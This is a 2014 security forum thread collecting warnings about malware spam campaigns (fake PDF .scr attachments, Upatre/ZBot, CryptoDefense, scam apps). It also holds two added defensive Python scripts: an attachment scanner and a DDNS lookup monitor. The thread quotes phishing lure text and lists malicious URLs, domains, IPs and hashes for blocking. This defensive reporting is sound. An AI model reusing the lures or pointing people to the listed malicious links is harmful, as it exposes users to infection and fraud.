The spammers are making use of the Windows feature which hides extensions of common file types...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/fbspam3.jpg
... the so-called PDF is actually an .scr file, commonly used in Malware campaigns... As for the Malware itself, the VirusTotal score is currently pegged at 23/51*, a Malwr analysis can be seen here**... Upatre is well known for email campaigns and downloading additional Malware onto a compromised PC – from there, browser credentials, insecure passwords and anything else the attacker can think of could be up for grabs. Upatre often tends to go hand in hand with ZBot, which has many ties to Ransomware..."
* https://www.virustotal.com/en/file/86e24ce48b0a4732eb11a912cc1f5d2962419042798108fea12ed8c656d59322/analysis/

** https://malwr.com/analysis/M2YyMjYwNjhkM2I1NDMxN2E5ZWQzNWNiYjQzMzljZTI/

- http://myonlinesecurity.co.uk/facebook-men-commented-status-fake-pdf-malware/
1 Apr 2014
___

Fake Companies House "Annual Return" – fake PDF malware
- http://myonlinesecurity.co.uk/companies-house-ar01-annual-return-received-fake-pdf-malware/
2 Apr 2014 - "... 'Annual Return' pretending to be from Companies House <web-filing@ companies-house .gov .uk> received is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Companies House
Thank you for completing a submission Reference # (0282665).
• (AR01) Annual Return
Your unique submission number is 0282665
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission.
Once accepted, these changes will be displayed on the public record...

Fake Companies House(AR01) Annual Return received:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/companies-house-annual-return.png
2 April 2014: Ref_0282665.zip (7kb) - Extracts to Ref_04022014.scr
Current Virus total detections: 14/51* . This (AR01) Annual Return received is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/254708a3742e9538609454ee33dfba5fb9eb3e9cd7f52b5889f76e1df76c9dff/analysis/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d8e1a430bf1091e1bb34d53c4f6394cb/tumblr_inline_n3ew2oX2u81r6pupn.png
___

Fake Bitdefender A/V ...
- http://www.hotforsecurity.com/blog/fans-tricked-with-fake-bitdefender-antivirus-plus-2015-8262.html
Mar 31, 2014 - "... -fake- Bitdefender antivirus download posted on YouTube leads users to fraudulent surveys and premium SMS scams. The video had hundreds of views and several French users posted messages to warn others.
> http://www.hotforsecurity.com/wp-content/uploads/2014/03/fans-tricked-with-fake-bitdefender-antivirus-plus-2015.jpg
... The grammatically-troubled spammers lure users into clicking on a URL-shortened link that hides a fraudulent website. The “Bitdefender” download is then blocked by a phony human verification warning. “It is very simple to verify, just complete any of the verification forms or surveys from the list below,” the message reads. The options include direct downloads, “how smart are you” surveys and selections of soccer games.
> http://www.hotforsecurity.com/wp-content/uploads/2014/03/fans-tricked-with-fake-bitdefender-antivirus-plus-2015-1.jpg
Users never get to download Bitdefender Antivirus Plus 2015, but they are redirected to scams such as premium SMS fraud that copies Facebook’s design to look like a legitimate app of the social network. For a month now, several “entrepreneurs” have also been spreading license keys for Bitdefender Total Security on Facebook. Bitdefender has reported the -fake- YouTube video and the -deceptive- Facebook profile and advises users to be cautious before downloading security software from third parties..."

:fear: :mad:
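Nearly every delivery in this thread is the same trick the Malwarebytes and myonlinesecurity items above describe: a ZIP whose only file is an .exe or .scr wearing a PDF or Word icon, often with a decoy extension in front (Deliery_info_7383461243.pdf.exe, disp_75464354787914325.doc.exe), relying on Explorer hiding the real extension. The scanner below is an added example (not code from Malwarebytes, myonlinesecurity, ThreatTrack or the forum poster) of what a mail gateway or triage script should do instead of trusting the name: walk the archive, including nested archives, judge each entry by both its extension chain and its magic bytes, and block on either. The sample ZIP is constructed in memory; the "executables" inside are MZ/PE header stubs, and the file names are those quoted in the posts.

```python
"""Triage ZIP attachments for disguised executables by name and by content.

Added example. build_sample_zip() constructs the test archive; the PE
payloads are header stubs, not real malware.
"""
import io
import zipfile

DOC_LIKE = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt", ".jpg", ".png", ".msg"}
EXEC_EXT = {".exe", ".scr", ".pif", ".com", ".cpl", ".bat", ".cmd", ".js", ".jse", ".vbs", ".jar"}
MAX_BYTES = 50 * 1024 * 1024  # refuse to inflate anything larger (zip-bomb guard, assumed limit)


def classify_name(name: str) -> str:
    """'double-extension' (decoy document extension before an executable one),
    'executable', 'ok' or 'no-extension', judged on the full extension chain."""
    base = name.lower().rsplit("/", 1)[-1]
    parts = base.split(".")
    exts = ["." + p for p in parts[1:]]
    if not exts:
        return "no-extension"
    if exts[-1] in EXEC_EXT:
        return "double-extension" if len(exts) > 1 and exts[-2] in DOC_LIKE else "executable"
    return "ok"


def magic_type(head: bytes) -> str:
    """Content type from the first bytes, independent of whatever the name claims."""
    if head[:2] == b"MZ":
        return "pe"
    if head[:4] == b"%PDF":
        return "pdf"
    if head[:4] == b"PK\x03\x04":
        return "zip"
    return "other"


def scan_zip_attachment(blob: bytes, prefix: str = "", depth: int = 0):
    """One finding per file entry; nested ZIPs are descended (a few levels) rather than trusted."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = prefix + info.filename
            if info.file_size > MAX_BYTES:
                findings.append({"name": name, "name_verdict": "oversized", "magic": "unknown", "block": True})
                continue
            data = zf.read(info)
            kind = magic_type(data[:8])
            if kind == "zip" and depth < 3:
                findings.extend(scan_zip_attachment(data, name + "/", depth + 1))
                continue
            verdict = classify_name(name)
            findings.append({
                "name": name,
                "name_verdict": verdict,
                "magic": kind,
                # Either signal alone is enough: a PE is a PE whatever it is called.
                "block": kind == "pe" or verdict in ("double-extension", "executable"),
            })
    return findings


# ---- constructed sample -------------------------------------------------------
_PE_STUB = b"MZ" + b"\0" * 62 + b"PE\0\0"


def build_sample_zip() -> bytes:
    """Outer ZIP with a double-extension PE, a bare .scr, a genuine PDF and a nested ZIP holding a .scr."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("CBE_Form.scr", _PE_STUB)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Deliery_info_7383461243.pdf.exe", _PE_STUB)
        z.writestr("Ref_04022014.scr", _PE_STUB)
        z.writestr("statement.pdf", b"%PDF-1.4\n%constructed sample\n")
        z.writestr("CBE_Form.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for f in scan_zip_attachment(build_sample_zip()):
        print(("BLOCK " if f["block"] else "allow ") + f"{f['name']}  name={f['name_verdict']} magic={f['magic']}")
```

The magic check is what matters on the endpoint side too: Explorer's "hide extensions for known file types" drops the final .exe or .scr and shows the icon from the PE's own resources, so a user who has not turned that setting off sees "Ref_04022014" with a PDF icon. Gateways that judge by name alone are fooled the same way the user is.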

AplusWebMaster
2014-04-04, 18:35
FYI

Attachment inside an attachment - UPATRE ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/upatre-ups-the-ante-with-attachment-inside-an-attachment/
Apr 4, 2014 - "... the UPATRE threat is constantly advancing its techniques–this time, by using multiple levels of attachments... a spammed message that imitates emails from known banks such as Lloyds Bank and Wells Fargo. The spam within spam technique was already notable in itself, as the .MSG file contained another .MSG file attached–only this time, the attached file actually contains the UPATRE variant, which we detect as TROJ_UPATRE.YYKE...
An email from “Lloyds Bank” contains a .MSG attachment
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/04/upatre-spam1.png
Opening the .MSG attachment reveals a malicious .ZIP file
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/04/upatre-spam2.png
Based on our analysis, TROJ_UPATRE.YYKE downloads its ZBOT tandem, detected as TSPY_ZBOT.YYKE. This ZBOT variant then downloads a NECURS variant detected as RTKT_NECURS.RBC. The NECURS malware is notable for its final payload of disabling computers’ security features, putting computers at serious risk for further infections. It gained notoriety in 2012 for its kernel-level rootkit and backdoor capabilities. It is important to note that we are now seeing an increase of this malware, which can be attributed to UPATRE/ZBOT being distributed as attachments to spammed messages... Users should always be on their guard when dealing with unknown or unfamiliar emails, sites, or files..."
___

SPAM: Important – New Outlook Settings – fake PDF malware
- http://myonlinesecurity.co.uk/important-new-outlook-settings-fake-pdf-malware/
Apr 4, 2014 - "... pretends to come from your own domain is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses...
Please carefully read the attached instructions before updating settings.
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@ thespykiller .co .uk and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

4 April 2014: OutlookSettings.zip (7kb) : Extracts to OutlookSettings.scr
Current Virus total detections: 5/51*. This Important – New Outlook Settings is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is..."
* https://www.virustotal.com/en/file/2c90d7bf5386c87821f27069e453acf2dd21c36d246062b0f6a176921d7d7c53/analysis/
____

Twitter Spam: Compromised Accounts and Websites lead to Diet Spam
- http://www.symantec.com/connect/blogs/twitter-spam-compromised-accounts-and-websites-lead-diet-spam
4 Apr 2014 - "Earlier this week, a large number of Twitter accounts were compromised and used by spammers to spread “miracle diet” spam. The compromised accounts included public figures, as well as average users of the social networking service.
Twitter miracle diet spam:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure1_10.png
... Twitter is no stranger to this problem. Over the years, we’ve seen many different campaigns try to capitalize on the latest miracle diet craze. In this particular case, spammers are trying to peddle garcinia cambogia extract through a page designed to look identical to the real Women’s Health website.
Fake promotional page used by spammers in this campaign
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure2_6.png
Many of the tweets contained messages saying “I couldn’t believe it when I lost 6 lbs!” and “I was skeptical, but I really lost weight!” followed by a URL shortened using Bitly .com. Celebrities and public figures are often sought after to help endorse products. One of the compromised accounts... By compromising accounts like Jamie’s, spammers increase their odds of convincing someone to click on their links and perhaps even purchase the diet product... Diet spam is here to stay and social networks remain the perfect place for spammers to try to make money off of unsuspecting users..."
___

Fiesta Exploits Kit Targeting High Alexa-Ranked Site
- https://atlas.arbor.net/briefs/index#-564048760
Elevated Severity
3 Apr 2014
Analysis: Exploit kits are easy to find and purchase, making attacks relatively easy for cybercriminals. Like other kits, Fiesta EK includes a number of exploits targeting widespread applications with disclosed vulnerabilities; it is rare for a kit to have zero-day capabilities... In addition, most vulnerabilities targeted by kits have patches available, including some updates available as far back as 2012. The most likely intended victims of EKs are therefore those with unpatched systems. Applying patches in a timely manner is absolutely critical for network security. Multiple Fiesta EK campaigns, including this current one, have made use of -dynamic- DNS (DDNS) domains to host exploits. Due to the widespread malicious use of DDNS, organizations should automatically scrutinize network traffic to DDNS in order to determine whether or not it is legitimate.
Source: http://community.websense.com/blogs/securitylabs/archive/2014/04/02/fiesta-exploits-kit-targeting-high-alexa-site.aspx
___

CryptoDefense - CryptoLocker imitator ...
- http://www.symantec.com/connect/blogs/cryptodefense-cryptolocker-imitator-makes-over-34000-one-month
Mar 31, 2014 - "... CryptoDefense appeared in late February 2014 and since that time Symantec telemetry shows that we have blocked over 11,000 unique CryptoDefense infections. Using the Bitcoin addresses provided by the malware authors for payment of the ransom and looking at the publicly available Bitcoin blockchain information, we can estimate that this malware earned cybercriminals over $34,000 in one month alone... Symantec has observed CryptoDefense being spammed out using emails such as the one shown:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure1_9.png
... Example of HOW_DECRYPT.HTML file:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure2_5.png
... malware authors are using the Tor network for payment of the ransom demand. If victims are not familiar with what the Tor network is, they even go as far as providing instructions on how to download a Tor-ready browser and enter the unique Tor payment Web page address. The use of the Tor network conceals the website’s location and provides anonymity and resistance to take down efforts. Other similar threats, such as Cryptorbit (Trojan.Nymaim.B), have used this tactic in the past... Once the user opens their unique personal page provided in the ransom demand using the Tor Browser, they will be presented with a CAPTCHA page:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure3_3.png
... Once they have filled in the CAPTCHA correctly, the user will be presented with the ransom payment page:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure4_4.png
... As advertised by the malware authors in the ransom demand, the files were encrypted with an RSA-2048 key generated on the victim’s computer. This was done using Microsoft’s own cryptographic infrastructure and Windows APIs to perform the key generation before sending it back in plain text to the attacker’s server. However, using this method means that the decryption key the attackers are holding for ransom actually still remains on the infected computer after transmission to the attacker’s server... To further protect against threats of this nature, it is recommended that you follow security best practices and -always- back up your files..."

:mad: :mad:
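The ATLAS note above recommends automatically scrutinizing traffic to dynamic-DNS hosts. The following is an added example (not code from Arbor, Websense or the poster) of that check run over DNS query logs: the BIND-style log format, the seed list of DDNS zones, the allowlist and the log lines themselves are all constructed assumptions for this example.

```python
"""Flag clients that look up hosts under dynamic-DNS (DDNS) providers.
Added example; log format, DDNS zone list, allowlist and sample lines are
assumptions constructed for illustration, not data from the thread."""
import re
from collections import Counter, defaultdict

# Assumed seed list of DDNS zones.  Replace with your own intel feed; matching
# is done on a label boundary so "myddns.net" does not match "ddns.net".
DDNS_ZONES = {"no-ip.org", "ddns.net", "dyndns.org", "hopto.org"}

# Assumed allowlist: DDNS names you have already confirmed are legitimate
# (the Websense advice is to decide legitimacy, not to block DDNS blindly).
ALLOWLIST = {"vpn-home.no-ip.org"}

# Assumed BIND-style query log line: "client <ip>#<port> (...): query: <name> IN <type> ..."
LOG_RE = re.compile(r"client (?P<client>[\d.]+)#\d+.*?: query: (?P<qname>\S+) IN (?P<qtype>\S+)")

def ddns_zone(qname):
    """Return the DDNS zone that qname falls under, or None."""
    name = qname.rstrip(".").lower()
    for zone in DDNS_ZONES:
        if name == zone or name.endswith("." + zone):
            return zone
    return None

def parse_line(line):
    """Return (client, qname, qtype) or None for lines that do not parse."""
    m = LOG_RE.search(line)
    if not m:
        return None
    return m.group("client"), m.group("qname").rstrip(".").lower(), m.group("qtype")

def scan(lines, allowlist=frozenset()):
    """Return {client: {qname: count}} covering only DDNS lookups not allowlisted."""
    hits = defaultdict(Counter)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        client, qname, _ = rec
        if ddns_zone(qname) and qname not in allowlist:
            hits[client][qname] += 1
    return {client: dict(names) for client, names in hits.items()}

def rank(hits):
    """Order clients by distinct DDNS hosts queried, then by total lookups."""
    rows = [(client, len(names), sum(names.values())) for client, names in hits.items()]
    return sorted(rows, key=lambda r: (r[1], r[2]), reverse=True)

# Constructed sample log (not captured traffic).  10.20.0.15 resolves two
# hosts under hopto.org; 10.20.0.31 resolves an allowlisted VPN name; the
# www.myddns.net line must not match the ddns.net zone.
SAMPLE_LOG = """\
10-Apr-2014 09:12:01.120 client 10.20.0.15#53122 (cdn.example.com): query: cdn.example.com IN A + (10.20.0.2)
10-Apr-2014 09:12:03.410 client 10.20.0.15#53123 (update-srv.hopto.org): query: update-srv.hopto.org IN A + (10.20.0.2)
10-Apr-2014 09:12:04.002 client 10.20.0.15#53124 (cfg.update-srv.hopto.org): query: cfg.update-srv.hopto.org IN A + (10.20.0.2)
10-Apr-2014 09:13:10.555 client 10.20.0.31#60211 (vpn-home.no-ip.org): query: vpn-home.no-ip.org IN A + (10.20.0.2)
10-Apr-2014 09:14:22.900 client 10.20.0.15#53125 (www.myddns.net): query: www.myddns.net IN A + (10.20.0.2)
this line is deliberately unparseable
"""

if __name__ == "__main__":
    report = scan(SAMPLE_LOG.splitlines(), allowlist=ALLOWLIST)
    for client, distinct, total in rank(report):
        print("%s: %d distinct DDNS hosts, %d lookups -> %s" % (client, distinct, total, sorted(report[client])))
```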

AplusWebMaster
2014-04-08, 15:25
FYI...

Fake Evernote – Image has been sent – leads to malware download
- http://myonlinesecurity.co.uk/image-sent-fake-evernote-leads-malware-download/
8 April 2014 - "... appears to come from Evernote service [support@ evernote .com] another one from the current bot runs which try to drop loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment.
Image has been sent < your name>.
DCIM_4199.jpg <http ://kingperu .com/1.html >
28 Kbytes
Go to Evernote <http ://kingperu .com/1.html>
2014 Evernote. Privacy policy provides our policies and procedures for collecting, using, and disclosing your information.
Users can access the Evernote service (the “Service”) through our website, applications on Devices, through APIs, and through third-parties.
A “Device” is any computer used to access the Evernote Service, including without limitation a desktop, laptop, mobile phone, tablet, or other consumer electronic device...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/evernote-image-has-been-sent.png

Following the link in the email sends you to a page offering a download of Vio player (why on earth anybody would think that they need vio player to view an image in evernote, I really don’t know). You -don’t- get the download offering from the original page but that loads 3 sites in the background and you are randomly sent to one...
8 April 2014 : setup.exe (565kb) : Current Virus total detections: 5/51*"
* https://www.virustotal.com/en/file/5e4f6b8ad552b9863fa0af5ab0fd844b9cdc84a04890e0450e979d9be1bd21b4/analysis/
___

Fake Sage SPAM ...
- http://blog.dynamoo.com/2014/04/sage-please-see-attached-copy-of.html
8 April 2014 - "This -fake- Sage spam comes with a malicious attachment:
Date: Tue, 8 Apr 2014 08:65:82 GMT
From: Sage [Merrill.Sterling@ sage-mail .com]
Subject: RE: BACs #3421309
Please see attached copy of the original invoice.

Attached is a file BACs-3421309.zip which in turn contains a malicious executable BACs-040814.exe which has a VirusTotal detection rate of 10/51*. The Malwr analysis** shows that it attempts to download a configuration file from [donotclick]hemblecreations .com/images/n0804UKd.dim and then it attempts to connect to a number of other domains and IP addresses.
Recommended blocklist:
50.116.4.71
aulbbiwslxpvvphxnjij .biz ..."
(More URLs listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/85f66c8cf954fe7d3093e698e3a2ce5964d16e163f2ca429329fdea2bfa2c2c8/analysis/1396961704/

** https://malwr.com/analysis/MDBjYmFhY2Q3ZDNjNDg0N2I3MGFmYTY0MjJlMWRhYTI/

- https://www.virustotal.com/en/ip-address/50.116.4.71/information/
___

Fake Starbucks 'gift' email – fake PDF malware
- http://myonlinesecurity.co.uk/starbucks-coffee-company-gift-form-friend-fake-pdf-malware/
8 April 2014 - "... another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This one is slightly more unusual than most others because they are sending a .exe file in the email and not a zipped file...
Your friend just made an order at Starbucks Coffee Company a few hours ago.
He pointed he is planning to make a special gift for you and he have a special occasion for that.
We’ve arranged an awesome menu for that case that can really surprise you with our new flavors.
In the attachment you can view the whole menu and the address and the exact time you can come and celebrate this day with your friend.
He asked to stay anonymous in order to make some mystery and desire to come and enjoy this atmosphere.
Have an awesome evening!

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/starbucks-gift.png

8 April 2014 Starbucks Coffee Company gift details on 12.04.2014.exe - Current Virus total detections: 4/50*. This Starbucks Coffee Company gift form your friend is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cd8701f7ecd98aff82deb2e447a9fbc8bc67265fe6df6e4732bcaf4dde672541/analysis/
___

Bank of America CashPro Spam
- http://threattrack.tumblr.com/post/82109999294/bank-of-america-cashpro-spam
Apr 8, 2014 - "Subjects Seen:
FW: Important documents
Typical e-mail details:
Important account documents
Reference: C58
Case number: 8924169
Please scan attached document and fax it to +1 (888) 589-0271.
Please note that the Terms and Conditions available below are the Bank’s most recently issued versions...

Malicious File Name and MD5:
AccountDocuments.zip (2A3034F7E6AD24B58CA11ED13AB2F84D)
Account_Documents.scr (3CD24390EDAE91C0913A20CEF18B5972)

Screenshots: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9213aae37d3813e5c8ddeabf01130b0a/tumblr_inline_n3q546rTSR1r6pupn.png

Tagged: Bank of America, CashPro, Upatre
___

Scam Virus Shield app top paid app in Play Store
- http://blog.malwarebytes.org/mobile-2/2014/04/scam-virus-shield-app-top-paid-app-in-play-store/
Apr 8, 2014 - "An app claiming to be an antivirus solution climbed the charts as a top paid app in the Play Store... The problem is the app is a -fake-, a scam really. It does not scan for nor does it detect malware on Android devices...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/virussheild03.jpg
The app doesn’t do much but change the protection status and run a progress bar in the notification area. Although it appears to do a scan, it does not and has very limited functionality. The app is no longer in the Play Store and was first reported by Android Police*..."
* http://www.androidpolice.com/2014/04/06/the-1-new-paid-app-in-the-play-store-costs-4-has-over-10000-downloads-a-4-7-star-rating-and-its-a-total-scam/

- http://cdn.androidpolice.com/wp-content/uploads/2014/04/nexusae0_2014-04-07-02.08.02.png

:fear: :mad:

AplusWebMaster
2014-04-09, 16:00
FYI...

Instagram Scam: Lottery Winners impersonated to offer Money for Followers
- http://www.symantec.com/connect/blogs/instagram-scam-lottery-winners-impersonated-offer-money-followers
9 Apr 2014 - "... Instagram scammers have been posting images offering -fake- lottery winnings to followers. They have convinced users to share the posts, give up personal information, and even send money back to the scammers...
> http://www.symantec.com/connect/sites/default/files/users/user-2998361/figure1_20.png
... In this -scam- a number of Instagram accounts have been created to impersonate real-life lottery winners from the UK and US. These accounts claim to offer US$1,000 to each Instagram user who follows them and leaves a comment with their email address... It’s clear that these accounts are fraudulent, but users continue to believe that they will be given US$1000 just for following Instagram accounts... if it sounds too good to be true, it is."
___

Something evil on 66.96.223.192/27
- http://blog.dynamoo.com/2014/04/something-evil-on-669622319227.html
9 Apr 2014 - "There seems to be some exploit activity today on the IP range 66.96.223.192/27 (a customer of Network Operations Center, US). Most domains are already -flagged- as malicious by Google, and I've reported on bad IPs in this range before. A list of the domains I can find in this range, their myWOT ratings and Google and SURBL prognoses can be found here* [csv]. I would recommend applying the following blocklist:
66.96.223.192/27
capcomcom .com
chebuesx .com ..."
(Long list at the dynamoo URL above.)
* http://www.dynamoo.com/files/66.96.223.192-27.csv
___

Fake eBay emails – Pharma SPAM
- http://myonlinesecurity.co.uk/fake-delayed-mails-ebay-pharma-spam/
9 Apr 2014 - "... we are now seeing fake < Your name >, You have delayed mails from eBay. In exactly the same way as The Fake Facebook Messages, these fake Ebay messages appear to come from eBayNotifier but are being sent by one of the botnets and -not- by Ebay at all. These only have 1 link in them unlike the previous which normally have 2 links in them, that if you are unwise enough to click on them will either take you to a Women’s Health page trying to sell you fake drugs for slimming or other women’s problems. Other days they send you to one of the Canadian or Russian Pharmacy pages selling Viagra, valium or other illegal drugs. Today's offerings are to a Canadian Pharma spam site. Always hover over the links in these emails and you will see that they do -not- lead to Ebay. Do not click on the links, just -delete- the emails as soon as they arrive. There is always the very high possibility that one of the other botnets will use these to send you to a malicious site where your computer will be infected... Email text will say something like:
Your name,
You have delayed mail
View mails
Yours truly
eBayNotifier

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/You-have-delayed-mails-from-eBay.png ..."

:mad: :fear:

AplusWebMaster
2014-04-10, 15:59
FYI...

Fake CDS Invoice – fake PDF malware
- http://myonlinesecurity.co.uk/cds-invoice-fake-pdf-malware/
10 April 2014 - "Following on from today’s and other recent DHL* and -other- delivery service failure notices, the malware gangs have changed track and are sending out local courier company invoices. CDS Invoice pretending to come from accounts@ cdsgroup .co .uk is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses...
Dear client
Please find attached your invoice number 168027
If you have any queries with this invoice, please email us... or call us...
For and on behalf of The CDS Group of Companies
Crawfords of London | Crawfords Delivery Services | Media Express | CDS International
Passenger Car Services Same Day UK Couriers TV Support Units Overnight & International...
This message and any attachment are confidential and may be privileged...
This email has been scanned...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/cds-invoice.png

9 April 2014: CDS_INVOICE_168027.zip (464 kb): Extracts to CDS_INVOICE_168027.exe
Current Virus total detections: 6/51**. This CDS Invoice is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/dhl-delivery-failure-fake-pdf-malware/
10 April 2014

Fake DHL email Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/02/DHL-delivery-report.png

** https://www.virustotal.com/en/file/13858453fadb0db87362264218d5f99f360814322b43b699f0c725de9def260c/analysis/1397115564/
___

SCAM: Climate Change And Health Conference ...
- http://blog.dynamoo.com/2014/04/ccahc-climate-change-and-health.html
10 April 2014 - "This -spam- is a form of an advanced fee fraud scam:
From: CCAHC ccahc@ live .com
Reply-To: ccahc@ e-mile .co .uk
Date: 10 April 2014 16:04
Subject: Call for Poster
CCAHC: Climate Change And Health Conference 2014
Dear Colleague,
On behalf of the CCAHC Scientific Committee, you are cordially invited to attend the 14th Climate Change & Health Conference to be held in Ibis Garden Hotel, from 16th - 18th May, 2014.
The CCAHC 2014 event promises unrivalled learning and networking opportunities for the general public. Invited speakers are experts from multiple sectors and disciplines. Case studies of successful collaborations of environment, nutrition and public health across a wide range of issues...
Sincerely yours,
Professor Jon Lloyd
Conference Chair
Maple House, 37-45 City Road, London EC1Y 1AT, United Kingdom

The email originates from 196.46.246.174 (Airtel, Nigeria) via 221.120.96.3 in Bangladesh. Note that the sender is using -free- email addresses rather than one that ties back to an identifiable organisation. The email was sent to a spamtrap... the sting is that there will be visa and hotel fees to pay before going to the conference, and once this money has been sent by Western Union then the scammers will -vanish- taking their mythical conference with them."
___

Fake UPS SPAM - Exception Notification – fake PDF malware
- http://myonlinesecurity.co.uk/ups-exception-notification-fake-pdf-malware/
10 April 2014 - "... UPS Exception Notification pretending to be from UPS Quantum View [auto-notify@ ups .com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers. This one has links in the email to download the malware laden zip, rather than an attachment...
UPS
Discover more about UPS:
Visit ups .com
At the request of the shipper, please be advised that delivery of the following shipment has been rescheduled.
Important Delivery Information
Tracking Number:1Z522A9A6892487822 [ clickable URL ]
Rescheduled Delivery Date:14-April-2014
Exception Reason:THE CUSTOMER WAS NOT AVAILABLE ON THE 1ST ATTEMPT. A 2ND ATTEMPT WILL BE MADE
Exception Resolution:PACKAGE WILL BE DELIVERED NEXT BUSINESS DAY.
Shipment Detail ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/UPS-Exception-Notification.png

... another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is..."

:mad: :fear:

AplusWebMaster
2014-04-11, 14:13
FYI...

Something evil on 62.75.140.236, 62.75.140.237, 62.75.140.238 and 64.120.207.253, 64.120.207.254
- http://blog.dynamoo.com/2014/04/something-evil-on-6275140236-6275140237.html
11 April 2014 - "This set of IPs is being used to push the Angler EK [1*] [2**]:
Intergenia, Germany
62.75.140.236
62.75.140.237
62.75.140.238
Network Operations Center (HostNOC), US
64.120.207.253
64.120.207.254
A look at the /24s that these ranges are in indicates a mix of malicious and legitimate sites, but on the whole it might be a good idea to consider blocking traffic to 62.75.140.0/24 and 64.120.207.0/24.
Sites on these IPs consist of hijacked subdomains of (mostly) legitimate domains in the Intergenia range and purely malicious domains in the HostNOC range..."
(Long list of domains at the dynamoo URL above.)
* http://wepawet.iseclab.org/view.php?hash=7d33b6700333f1babb56e2f92b006524&t=1397206144&type=js

** http://urlquery.net/report.php?id=1397206442682
___

Fake UKMail - Proof of Delivery Report – fake PDF malware
- http://myonlinesecurity.co.uk/proof-delivery-report-ukmail-fake-pdf-malware/
11 April 2014 - "Continuing from yesterday’s theme of parcel & courier email messages, the malware bad guys are continuing with the same theme today. Proof of Delivery Report: 09/04/14-11/04/14, pretending to come from UKMail Customer Services [list_reportservices@ ukmail .com] is another one from the current bot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Dear Customer,
Please find attached your requested Proof of Delivery (POD) Download Report
………………………………………………………………………………………………………………………
iMail Logo
“For creating, printing and posting your next day mail”
click here to realise the savings that you could make
Please consider the environment before printing this e-mail or any attachments.
This email and its attachments may be confidential and are intended solely for the use of the individual to whom it is addressed.
If you have received this message in error, please notify us and remove it from your system. Any views or opinions expressed are solely those of the author and do not necessarily represent those of UK Mail Group Plc or any of its subsidiaries.
UK Mail Group Plc is registered and incorporated in England.
Registered Office: Express House, 120 Buckingham Avenue, Slough, SL1 4LZ, United Kingdom.
Registered Company No.: 02800218.

11 April 2014: poddel-pdf-2014041103004500.zip (59 kb). Extracts to poddel-pdf-2014041103004500.exe
Current Virus total detections: 2/51*. This Proof of Delivery Report: 09/04/14-11/04/14 is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/fc3cfa2fffe6b93339402c371d90a51bc7fc03e4ecabbe3e5ab09e68e29a8f0d/analysis/

:mad: :fear:

AplusWebMaster
2014-04-16, 23:27
FYI...

Something still evil on 66.96.223.192/27
- http://blog.dynamoo.com/2014/04/something-still-evil-on-669622319227.html
